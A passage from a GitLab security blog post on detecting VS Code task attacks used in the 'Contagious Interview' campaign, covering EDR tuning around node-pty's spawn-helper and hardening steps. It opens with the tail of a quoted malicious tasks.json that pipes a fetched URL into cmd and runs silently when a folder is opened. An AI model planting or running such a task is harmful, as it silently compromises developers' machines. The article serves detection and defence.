https://www.example[.]com/settings/windows?flag=8 | cmd\"\n          },\n          \"problemMatcher\": [],\n          \"presentation\": {\n            \"reveal\": \"never\",\n            \"echo\": false,\n            \"focus\": false,\n            \"close\": true,\n            \"panel\": \"dedicated\",\n            \"showReuseMessage\": false\n          },\n          \"runOptions\": {\n            \"runOn\": \"folderOpen\"\n          }\n        }\n      ]\n    ```\n\n\n    This malicious code execution is then typically used to deploy infostealers, steal passwords and cryptocurrency, and ultimately establish persistence to abuse victims’ trusted accesses to corporate networks.\n\n\n    Once we understood how the threat actor was gaining initial code execution, we had a target for preventative measures to catch these attacks before GitLab workstations were targeted.\n\n\n    ## Multi-faceted detection and prevention\n\n\n    We always want to develop detective and preventative controls that are as “low level” as possible, since these types of detections are typically more difficult to bypass. Additionally, threat intelligence indicated that other projects that forked VS Code are also vulnerable to this malicious repository attack. So, instead of focusing specifically on a VS Code detection, we wanted to find the area “closest to the operating system” where this malicious code execution could be identified. This would allow our detection techniques to detect not only exploitation via VS Code tasks, but also attacks targeting using a VS Code fork or similar IDE written in Node that has background tasks.  \n       \n    Reviewing VS Code source, we identified that the `node-pty.spawn()` library call is used across the product when subprocesses need to be used. The [node-pty library](https://www.npmjs.com/package/node-pty) is incredibly popular, with over a million weekly downloads at time of writing. This library enables Node applications (including Electron applications such as VS Code) to fork subprocesses from a node context, and results in calls to its own binary, `spawn-helper`. When subprocesses are launched, `spawn-helper` is spawned as a child process of the Node application calling it.\n\n\n    After performing a Purple Team operation to emulate this specific attack path, we reviewed our Endpoint Detection and Response (EDR) telemetry to try to not only develop a strong detection for the emulated attack, but also to tune this detection to only alert on suspicious activity, and not on legitimate developer activity. We identified that `spawn-helper` is called in situations where VS Code wants to spawn tasks that occur in the *background*, without user visibility or interaction. Conversely, a `Code Helper` binary is called when new processes (such as the integrated Terminal) are launched in the *foreground* with user interaction.\n\n\n    This allows us to craft detections that only look for subprocesses spawned without the user’s knowledge, and avoid false positives that flag subprocesses a user might intentionally spawn while using their IDE.\n\n\n    As shown earlier, a commonly-seen malicious task contains commands that run a `curl | \u003Cshell>` from a task. Although `curl | bash` can be a legitimate way to install software like Homebrew, in our environment, it should never happen in the background without the user’s knowledge. This distinction allowed us to tune `spawn-helper`\\-based detections to not alert on *every* background task that ran, but to instead trigger only on behaviors that are uncommon and suspicious in our environment. Since implementing this detection technique, we have had no false positives, even though a large part of our organization uses VS Code daily.\n\n\n    Although this article has focused on detecting `spawn-helper` in your environment, this is only one of many layers of defense that you can implement in your organization to prevent and detect these IDE task-based attacks.\n\n\n    In addition to using EDR instrumentation to detect a malicious task at runtime, you can proactively harden your fleet against this type of attack by pushing global configs to disable task runs in VS Code. If that is too disruptive to your developers, you can also scan your environment to enumerate how often users use trusted workspaces and trusted workspace folders within their typical VS Code usage, and run education campaigns to help inform the company about the risks posed by this Contagious Interview attack path.\n\n\n    ## Summary\n\n\n    GitLab Security Operations works around the clock to protect our customers and our company. With our tightly coupled security teams, we are able to produce actionable threat intelligence, leverage that threat intel to inform adversary emulation operations, and ultimately develop technical and procedural prevention and detection techniques that protect our customers and company.\n\n\n    As VS Code tasks continue to receive visibility in the security community, it’s possible that other threat actors will attempt to use this attack path for their own ends. We hope that this small example of the work we do to protect GitLab and our customers against Advanced Persistent Threats can inspire others to do the same, and to join us in our continued mission to disrupt these threat actors. \n\n\n    > Follow our innovation and research on our [Security Labs site](https://about.gitlab.com/blog/categories/security-labs/).\n  category: security-labs\n  tags:\n    - security\n    - security research\n    - product\n    - tutorial\nconfig:\n  featured: false\n  template: BlogPost\n  slug: how-to-detect-and-prevent-contagious-interview-ide-attacks\n",{"config":720,"title":697,"description":721},{"noIndex":11},"Learn how we built custom controls that detect and prevent malware campaigns like those used for Contagious Interview.","en-us/blog/how-to-detect-and-prevent-contagious-interview-ide-attacks",[712,724,714,715],"security-research",[712,713,714,715],"_u_KINomJDgQvUO5rmENdJEiV1SNGECCwjqthi_HDgw",[728,737,746,755,763,772,782,791,800],{"content":729,"config":735},{"title":730,"heroImage":731,"category":10,"description":732,"authors":733},"Build an automated detection testing framework with GitLab CI/CD and Duo","https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png","Learn how GitLab's Signals Engineering team built the WATCH framework to continuously validate our security monitoring pipeline.",[734],"Evan Baltman",{"externalUrl":-1,"slug":736},"automated-detection-testing-framework",{"content":738,"config":744},{"title":739,"heroImage":740,"category":10,"description":741,"authors":742},"Pipeline security lessons from March supply chain incidents","https://res.cloudinary.com/about-gitlab-com/image/upload/v1772630163/akp8ly2mrsfrhsb0liyb.png","Learn how centralized pipeline policies can detect and block the patterns behind a series of recent attacks.",[743],"Grant Hickman",{"externalUrl":-1,"slug":745},"pipeline-security-lessons-from-march-supply-chain-incidents",{"content":747,"config":753},{"title":748,"heroImage":749,"category":10,"description":750,"authors":751},"Automating detection gap analysis with GitLab Duo Agent Platform","https://res.cloudinary.com/about-gitlab-com/image/upload/v1773147991/op5xyroonltdwqix0x3u.png","Learn how GitLab's Signals Engineering team uses our AI platform to automatically surface detection gaps from security incidents — no manual review required.",[752],"Matt Coons",{"externalUrl":-1,"slug":754},"automating-detection-gap-analysis-with-gitlab-duo-agent-platform",{"content":756,"config":761},{"title":757,"heroImage":740,"category":10,"description":758,"authors":759},"How GitLab built a security control framework from scratch","GitLab's Security Compliance team created a custom control framework to scale across multiple certifications and products — here's why and how you can, too.\n",[760],"Davoud Tu",{"externalUrl":-1,"slug":762},"how-gitlab-built-a-security-control-framework-from-scratch",{"content":764,"config":770},{"title":765,"heroImage":766,"category":10,"description":767,"authors":768},"GitLab Threat Intelligence Team reveals North Korean tradecraft","https://res.cloudinary.com/about-gitlab-com/image/upload/v1751464282/r2ovpvmizpkcngy9kzqu.png","Gain threat intelligence about North Korea’s Contagious Interview and fake IT worker campaigns and learn how GitLab disrupted their operations.",[769],"Oliver Smith",{"externalUrl":-1,"slug":771},"gitlab-threat-intelligence-reveals-north-korean-tradecraft",{"content":773,"config":780},{"title":774,"heroImage":775,"category":10,"description":776,"authors":777},"GitLab discovers widespread npm supply chain attack","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665667/Blog/Hero%20Images/built-in-security.jpg","Malware driving attack includes \"dead man's switch\" that can harm user data.",[778,779],"Michael Henriksen","Daniel Abeles",{"externalUrl":-1,"slug":781},"gitlab-discovers-widespread-npm-supply-chain-attack",{"content":783,"config":789},{"title":784,"heroImage":785,"category":10,"description":786,"authors":787},"How to transform compliance observation management with GitLab","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675154/Blog/Hero%20Images/blog-image-template-1800x945__8_.png","Learn how GitLab's Security Compliance team improved observation management using the DevSecOps platform, enhancing visibility, collaboration, and accountability.",[788],"Madeline Lake",{"externalUrl":-1,"slug":790},"how-to-transform-compliance-observation-management-with-gitlab",{"content":792,"config":798},{"title":793,"heroImage":794,"category":10,"description":795,"authors":796},"Self-service security alert handling with GitLab's UAM","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662080/Blog/Hero%20Images/AdobeStock_1097303277.jpg","The User Attestation Module automates security alerts by routing them directly to team members for verification, reducing manual SecOps work and enhancing audit trails.",[797,752],"Bala Allam",{"externalUrl":-1,"slug":799},"self-service-security-alert-handling-with-gitlabs-uam",{"content":801,"config":807},{"title":802,"heroImage":803,"category":10,"description":804,"authors":805},"How GitLab measures Red Team impact: The adoption rate metric","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663239/Blog/Hero%20Images/AdobeStock_1023776629.jpg","Follow our journey to develop and implement better metrics, including how we used GitLab to track our results end-to-end. Also find out the lessons learned along the way.",[806],"Chris Moberly",{"externalUrl":-1,"slug":808},"how-gitlab-measures-red-team-impact-the-adoption-rate-metric",1777934808097]